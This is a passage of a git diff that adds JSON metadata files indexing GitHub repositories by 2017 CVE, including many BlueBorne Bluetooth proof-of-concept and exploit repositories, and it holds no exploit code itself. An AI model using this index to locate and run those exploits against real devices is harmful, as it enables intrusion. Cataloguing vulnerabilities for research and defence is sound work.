"https:\/\/github.com\/erfze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erfze\/CVE-2017-0261", + "description": "CVE-2017-8570 Exp及利用样本分析", + "fork": false, + "created_at": "2020-08-22T03:01:51Z", + "updated_at": "2020-08-22T03:28:04Z", + "pushed_at": "2020-08-22T03:26:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0263.json b/2017/CVE-2017-0263.json new file mode 100644 index 0000000000..624981238a --- /dev/null +++ b/2017/CVE-2017-0263.json @@ -0,0 +1,33 @@ +[ + { + "id": 164377700, + "name": "cve-2017-0263-poc", + "full_name": "R06otMD5\/cve-2017-0263-poc", + "owner": { + "login": "R06otMD5", + "id": 25081496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25081496?v=4", + "html_url": "https:\/\/github.com\/R06otMD5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R06otMD5\/cve-2017-0263-poc", + "description": "poc for 0263", + "fork": false, + "created_at": "2019-01-07T04:21:25Z", + "updated_at": "2019-01-07T04:21:28Z", + "pushed_at": "2019-01-07T04:21:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0290.json b/2017/CVE-2017-0290.json new file mode 100644 index 0000000000..9d739e2976 --- /dev/null +++ b/2017/CVE-2017-0290.json @@ -0,0 +1,33 @@ +[ + { + "id": 90935850, + "name": "CVE-2017-0290-", + "full_name": "homjxi0e\/CVE-2017-0290-", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-0290-", + "description": null, + "fork": false, + "created_at": "2017-05-11T04:01:51Z", + "updated_at": "2017-05-11T04:01:51Z", + "pushed_at": "2017-05-11T05:24:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0358.json b/2017/CVE-2017-0358.json new file mode 100644 index 0000000000..080614f7e8 --- /dev/null +++ b/2017/CVE-2017-0358.json @@ -0,0 +1,33 @@ +[ + { + "id": 480851528, + "name": "cve-2017-0358.sh", + "full_name": "Wangsafz\/cve-2017-0358.sh", + "owner": { + "login": "Wangsafz", + "id": 101844613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101844613?v=4", + "html_url": "https:\/\/github.com\/Wangsafz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wangsafz\/cve-2017-0358.sh", + "description": null, + "fork": false, + "created_at": "2022-04-12T14:44:13Z", + "updated_at": "2022-04-12T14:44:39Z", + "pushed_at": "2022-04-12T14:44:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0411.json b/2017/CVE-2017-0411.json new file mode 100644 index 0000000000..0b29ea4bcf --- /dev/null +++ b/2017/CVE-2017-0411.json @@ -0,0 +1,33 @@ +[ + { + "id": 132620665, + "name": "PoC", + "full_name": "lulusudoku\/PoC", + "owner": { + "login": "lulusudoku", + "id": 11342842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11342842?v=4", + "html_url": "https:\/\/github.com\/lulusudoku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lulusudoku\/PoC", + "description": "CVE-2017-0411 PoC refered p0", + "fork": false, + "created_at": "2018-05-08T14:25:29Z", + "updated_at": "2018-05-09T06:10:02Z", + "pushed_at": "2018-05-09T06:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0478.json b/2017/CVE-2017-0478.json new file mode 100644 index 0000000000..187db9defb --- /dev/null +++ b/2017/CVE-2017-0478.json @@ -0,0 +1,64 @@ +[ + { + "id": 85536999, + "name": "CVE-2017-0478", + "full_name": "bingghost\/CVE-2017-0478", + "owner": { + "login": "bingghost", + "id": 8372687, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8372687?v=4", + "html_url": "https:\/\/github.com\/bingghost", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bingghost\/CVE-2017-0478", + "description": "poc of CVE-2017-0478", + "fork": false, + "created_at": "2017-03-20T05:01:43Z", + "updated_at": "2023-09-07T05:10:57Z", + "pushed_at": "2017-03-19T02:43:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 141312944, + "name": "CVE-2017-0478", + "full_name": "likekabin\/CVE-2017-0478", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2017-0478", + "description": null, + "fork": false, + "created_at": "2018-07-17T16:01:13Z", + "updated_at": "2018-07-17T16:01:28Z", + "pushed_at": "2018-07-17T16:01:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0505.json b/2017/CVE-2017-0505.json new file mode 100644 index 0000000000..42120dbc51 --- /dev/null +++ b/2017/CVE-2017-0505.json @@ -0,0 +1,36 @@ +[ + { + "id": 455717954, + "name": "CVE-2017-0505-mtk", + "full_name": "R0rt1z2\/CVE-2017-0505-mtk", + "owner": { + "login": "R0rt1z2", + "id": 39171306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39171306?v=4", + "html_url": "https:\/\/github.com\/R0rt1z2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R0rt1z2\/CVE-2017-0505-mtk", + "description": null, + "fork": false, + "created_at": "2022-02-04T22:43:21Z", + "updated_at": "2024-09-23T16:52:21Z", + "pushed_at": "2022-02-04T22:54:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "mtk", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0541.json b/2017/CVE-2017-0541.json new file mode 100644 index 0000000000..818de4cfcc --- /dev/null +++ b/2017/CVE-2017-0541.json @@ -0,0 +1,64 @@ +[ + { + "id": 87668645, + "name": "CVE-2017-0541", + "full_name": "C0dak\/CVE-2017-0541", + "owner": { + "login": "C0dak", + "id": 17883550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17883550?v=4", + "html_url": "https:\/\/github.com\/C0dak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C0dak\/CVE-2017-0541", + "description": "poc and vulnerability analysis of CVE-2017-0541", + "fork": false, + "created_at": "2017-04-08T22:44:18Z", + "updated_at": "2023-09-07T05:10:25Z", + "pushed_at": "2017-04-08T14:45:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 141312906, + "name": "CVE-2017-0541", + "full_name": "likekabin\/CVE-2017-0541", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2017-0541", + "description": null, + "fork": false, + "created_at": "2018-07-17T16:00:57Z", + "updated_at": "2018-07-17T16:01:14Z", + "pushed_at": "2018-07-17T16:01:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0554.json b/2017/CVE-2017-0554.json new file mode 100644 index 0000000000..2e5792fc36 --- /dev/null +++ b/2017/CVE-2017-0554.json @@ -0,0 +1,33 @@ +[ + { + "id": 115291853, + "name": "tethr", + "full_name": "lanrat\/tethr", + "owner": { + "login": "lanrat", + "id": 164192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164192?v=4", + "html_url": "https:\/\/github.com\/lanrat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lanrat\/tethr", + "description": "Android Tethering Provisioning Check Bypass (CVE-2017-0554)", + "fork": false, + "created_at": "2017-12-24T23:18:28Z", + "updated_at": "2024-09-25T13:31:14Z", + "pushed_at": "2020-09-11T04:45:20Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0564.json b/2017/CVE-2017-0564.json new file mode 100644 index 0000000000..e74cd8fd56 --- /dev/null +++ b/2017/CVE-2017-0564.json @@ -0,0 +1,33 @@ +[ + { + "id": 117041381, + "name": "CVE-2017-0564-ION-PoC", + "full_name": "guoygang\/CVE-2017-0564-ION-PoC", + "owner": { + "login": "guoygang", + "id": 16954452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16954452?v=4", + "html_url": "https:\/\/github.com\/guoygang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guoygang\/CVE-2017-0564-ION-PoC", + "description": "ION通用提权漏洞PoC以及分析", + "fork": false, + "created_at": "2018-01-11T02:50:26Z", + "updated_at": "2022-05-26T08:30:12Z", + "pushed_at": "2018-01-11T02:53:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0781.json b/2017/CVE-2017-0781.json new file mode 100644 index 0000000000..b00f92c0df --- /dev/null +++ b/2017/CVE-2017-0781.json @@ -0,0 +1,198 @@ +[ + { + "id": 106299703, + "name": "CVE-2017-0781", + "full_name": "ojasookert\/CVE-2017-0781", + "owner": { + "login": "ojasookert", + "id": 12931198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12931198?v=4", + "html_url": "https:\/\/github.com\/ojasookert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ojasookert\/CVE-2017-0781", + "description": "Blueborne CVE-2017-0781 Android heap overflow vulnerability", + "fork": false, + "created_at": "2017-10-09T15:13:25Z", + "updated_at": "2024-11-06T02:08:21Z", + "pushed_at": "2021-07-29T12:00:48Z", + "stargazers_count": 138, + "watchers_count": 138, + "has_discussions": false, + "forks_count": 50, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "armis", + "blueborne", + "bluetooth", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 50, + "watchers": 138, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 128436971, + "name": "android712-blueborne", + "full_name": "X3eRo0\/android712-blueborne", + "owner": { + "login": "X3eRo0", + "id": 24680989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24680989?v=4", + "html_url": "https:\/\/github.com\/X3eRo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X3eRo0\/android712-blueborne", + "description": "Android Blueborne RCE CVE-2017-0781", + "fork": false, + "created_at": "2018-04-06T18:32:19Z", + "updated_at": "2018-12-05T14:30:22Z", + "pushed_at": "2018-04-04T12:59:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 283876725, + "name": "BlueborneDetection", + "full_name": "mjancek\/BlueborneDetection", + "owner": { + "login": "mjancek", + "id": 32901382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32901382?v=4", + "html_url": "https:\/\/github.com\/mjancek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mjancek\/BlueborneDetection", + "description": "Simple detection tool for Blueborne vulnerability found on Android devices --- CVE-2017-0781. ", + "fork": false, + "created_at": "2020-07-30T21:06:19Z", + "updated_at": "2021-04-30T12:44:56Z", + "pushed_at": "2021-04-30T12:44:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueborne", + "bluetooth", + "c" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 303310240, + "name": "Blue-Borne", + "full_name": "CrackSoft900\/Blue-Borne", + "owner": { + "login": "CrackSoft900", + "id": 69074572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69074572?v=4", + "html_url": "https:\/\/github.com\/CrackSoft900", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackSoft900\/Blue-Borne", + "description": "BlueBorne Exploits & Framework This repository contains a PoC code of various exploits for the BlueBorne vulnerabilities. Under 'android' exploits for the Android RCE vulnerability (CVE-2017-0781), and the SDP Information leak vulnerability (CVE-2017-0785) can be found. Under 'linux-bluez' exploits for the Linux-RCE vulnerability (CVE-2017-1000251) can be found (for Amazon Echo, and Samsung Gear S3). Under 'l2cap_infra' a general testing framework to send and receive raw l2cap messages (using scapy) can be found. Under 'nRF24_BDADDR_Sniffer' a tool to capture bluetooth mac addresses (BDADDR) over the air, using a nRF24L01 chip For more details on BlueBorne, you may read the full technical white paper available here: https:\/\/www.armis.com\/blueborne\/ In addition a several detailed blog posts on the exploitation of these vulnerability can be found here: https:\/\/www.armis.com\/blog\/ =============== Dependencies:", + "fork": false, + "created_at": "2020-10-12T07:21:08Z", + "updated_at": "2024-08-07T03:01:06Z", + "pushed_at": "2020-11-04T16:49:05Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440265596, + "name": "sploit-bX", + "full_name": "CarlosDelRosario7\/sploit-bX", + "owner": { + "login": "CarlosDelRosario7", + "id": 65183782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65183782?v=4", + "html_url": "https:\/\/github.com\/CarlosDelRosario7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CarlosDelRosario7\/sploit-bX", + "description": "Bash que instala los sploit CVE-2017-0781 y CVE-2017-0785 y lo necesario para su usos.", + "fork": false, + "created_at": "2021-12-20T18:14:36Z", + "updated_at": "2024-10-13T21:11:08Z", + "pushed_at": "2021-12-21T13:05:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670160089, + "name": "Learn.BlueJam", + "full_name": "DamianSuess\/Learn.BlueJam", + "owner": { + "login": "DamianSuess", + "id": 1216684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1216684?v=4", + "html_url": "https:\/\/github.com\/DamianSuess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DamianSuess\/Learn.BlueJam", + "description": "Learn what is BlueJam CVE-2017-0781", + "fork": false, + "created_at": "2023-07-24T12:28:02Z", + "updated_at": "2023-08-22T10:28:29Z", + "pushed_at": "2023-07-24T12:28:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0785.json b/2017/CVE-2017-0785.json new file mode 100644 index 0000000000..c6861c6f97 --- /dev/null +++ b/2017/CVE-2017-0785.json @@ -0,0 +1,348 @@ +[ + { + "id": 104278164, + "name": "CVE-2017-0785", + "full_name": "ojasookert\/CVE-2017-0785", + "owner": { + "login": "ojasookert", + "id": 12931198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12931198?v=4", + "html_url": "https:\/\/github.com\/ojasookert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ojasookert\/CVE-2017-0785", + "description": "Blueborne CVE-2017-0785 Android information leak vulnerability", + "fork": false, + "created_at": "2017-09-20T23:32:29Z", + "updated_at": "2024-10-20T16:30:15Z", + "pushed_at": "2017-09-23T05:11:45Z", + "stargazers_count": 462, + "watchers_count": 462, + "has_discussions": false, + "forks_count": 186, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueborne", + "cve-2017-0785", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 186, + "watchers": 462, + "score": 0, + "subscribers_count": 45 + }, + { + "id": 104516404, + "name": "CVE-2017-0785", + "full_name": "aymankhalfatni\/CVE-2017-0785", + "owner": { + "login": "aymankhalfatni", + "id": 19715320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19715320?v=4", + "html_url": "https:\/\/github.com\/aymankhalfatni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aymankhalfatni\/CVE-2017-0785", + "description": "CVE-2017-0785: BlueBorne PoC", + "fork": false, + "created_at": "2017-09-22T20:33:12Z", + "updated_at": "2017-09-22T20:34:33Z", + "pushed_at": "2017-09-22T20:34:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 104522460, + "name": "-CVE-2017-0785-BlueBorne-PoC", + "full_name": "Alfa100001\/-CVE-2017-0785-BlueBorne-PoC", + "owner": { + "login": "Alfa100001", + "id": 29385626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29385626?v=4", + "html_url": "https:\/\/github.com\/Alfa100001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alfa100001\/-CVE-2017-0785-BlueBorne-PoC", + "description": "CVE-2017-0785 BlueBorne PoC", + "fork": false, + "created_at": "2017-09-22T22:03:40Z", + "updated_at": "2024-08-12T19:32:49Z", + "pushed_at": "2017-09-22T22:23:52Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 39, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 105568835, + "name": "BlueBorne-CVE-2017-0785", + "full_name": "Hackerscript\/BlueBorne-CVE-2017-0785", + "owner": { + "login": "Hackerscript", + "id": 29609985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29609985?v=4", + "html_url": "https:\/\/github.com\/Hackerscript", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hackerscript\/BlueBorne-CVE-2017-0785", + "description": "this script is used for hack bluetooth devices CVE 2017 0785 which was done by ARMIS This File is password protected for password contact atusha@gmail.comr", + "fork": false, + "created_at": "2017-10-02T18:21:43Z", + "updated_at": "2024-06-08T05:42:25Z", + "pushed_at": "2017-10-02T18:21:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 105816209, + "name": "blueborne", + "full_name": "pieterbork\/blueborne", + "owner": { + "login": "pieterbork", + "id": 31708728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31708728?v=4", + "html_url": "https:\/\/github.com\/pieterbork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pieterbork\/blueborne", + "description": "Scan\/Exploit Blueborne CVE-2017-0785", + "fork": false, + "created_at": "2017-10-04T20:41:12Z", + "updated_at": "2024-08-12T19:33:03Z", + "pushed_at": "2018-02-28T07:04:05Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 30, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 116589306, + "name": "diff", + "full_name": "sigbitsadmin\/diff", + "owner": { + "login": "sigbitsadmin", + "id": 33204560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33204560?v=4", + "html_url": "https:\/\/github.com\/sigbitsadmin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sigbitsadmin\/diff", + "description": "Simply diff for CVE-2017-0785", + "fork": false, + "created_at": "2018-01-07T18:30:42Z", + "updated_at": "2018-01-07T18:31:03Z", + "pushed_at": "2018-01-07T18:31:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 122293991, + "name": "Bluetooth-Crash-CVE-2017-0785", + "full_name": "RavSS\/Bluetooth-Crash-CVE-2017-0785", + "owner": { + "login": "RavSS", + "id": 31635233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31635233?v=4", + "html_url": "https:\/\/github.com\/RavSS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RavSS\/Bluetooth-Crash-CVE-2017-0785", + "description": null, + "fork": false, + "created_at": "2018-02-21T04:53:41Z", + "updated_at": "2019-07-28T03:26:34Z", + "pushed_at": "2018-04-20T16:12:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 555929812, + "name": "BlueBorn", + "full_name": "sh4rknado\/BlueBorn", + "owner": { + "login": "sh4rknado", + "id": 22647816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22647816?v=4", + "html_url": "https:\/\/github.com\/sh4rknado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sh4rknado\/BlueBorn", + "description": "CVE-2017-0785", + "fork": false, + "created_at": "2022-10-22T17:10:34Z", + "updated_at": "2022-10-22T17:26:40Z", + "pushed_at": "2022-10-22T17:26:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564378327, + "name": "CVE-2017-0785", + "full_name": "Joanmei\/CVE-2017-0785", + "owner": { + "login": "Joanmei", + "id": 111132025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111132025?v=4", + "html_url": "https:\/\/github.com\/Joanmei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Joanmei\/CVE-2017-0785", + "description": null, + "fork": false, + "created_at": "2022-11-10T15:34:58Z", + "updated_at": "2022-11-10T15:34:58Z", + "pushed_at": "2022-11-10T15:34:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565399462, + "name": "Py3-CVE-2017-0785", + "full_name": "CyberKimathi\/Py3-CVE-2017-0785", + "owner": { + "login": "CyberKimathi", + "id": 118065196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118065196?v=4", + "html_url": "https:\/\/github.com\/CyberKimathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberKimathi\/Py3-CVE-2017-0785", + "description": null, + "fork": false, + "created_at": "2022-11-13T09:32:11Z", + "updated_at": "2023-01-03T10:10:05Z", + "pushed_at": "2022-11-13T10:12:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 780003073, + "name": "Upgraded_BlueBourne-CVE-2017-0785-", + "full_name": "MasterCode112\/Upgraded_BlueBourne-CVE-2017-0785-", + "owner": { + "login": "MasterCode112", + "id": 105772414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105772414?v=4", + "html_url": "https:\/\/github.com\/MasterCode112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterCode112\/Upgraded_BlueBourne-CVE-2017-0785-", + "description": "upgraded of BlueBourne CVE-2017-0785 to python3 ", + "fork": false, + "created_at": "2024-03-31T12:22:11Z", + "updated_at": "2024-07-09T14:47:20Z", + "pushed_at": "2024-03-31T12:29:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0806.json b/2017/CVE-2017-0806.json new file mode 100644 index 0000000000..3872079bd9 --- /dev/null +++ b/2017/CVE-2017-0806.json @@ -0,0 +1,33 @@ +[ + { + "id": 135889098, + "name": "ReparcelBug", + "full_name": "michalbednarski\/ReparcelBug", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/ReparcelBug", + "description": "CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel\/createFromParcel mismatch)", + "fork": false, + "created_at": "2018-06-03T09:04:50Z", + "updated_at": "2024-04-24T14:15:16Z", + "pushed_at": "2018-06-03T09:06:00Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0807.json b/2017/CVE-2017-0807.json new file mode 100644 index 0000000000..900fb3e838 --- /dev/null +++ b/2017/CVE-2017-0807.json @@ -0,0 +1,37 @@ +[ + { + "id": 117631583, + "name": "PoC_CVE-2017-0807", + "full_name": "kpatsakis\/PoC_CVE-2017-0807", + "owner": { + "login": "kpatsakis", + "id": 9294190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9294190?v=4", + "html_url": "https:\/\/github.com\/kpatsakis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kpatsakis\/PoC_CVE-2017-0807", + "description": "Proof of concept of CVE-2017-0807", + "fork": false, + "created_at": "2018-01-16T04:34:06Z", + "updated_at": "2018-11-26T05:17:02Z", + "pushed_at": "2018-01-16T04:55:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve-2017-0807", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at 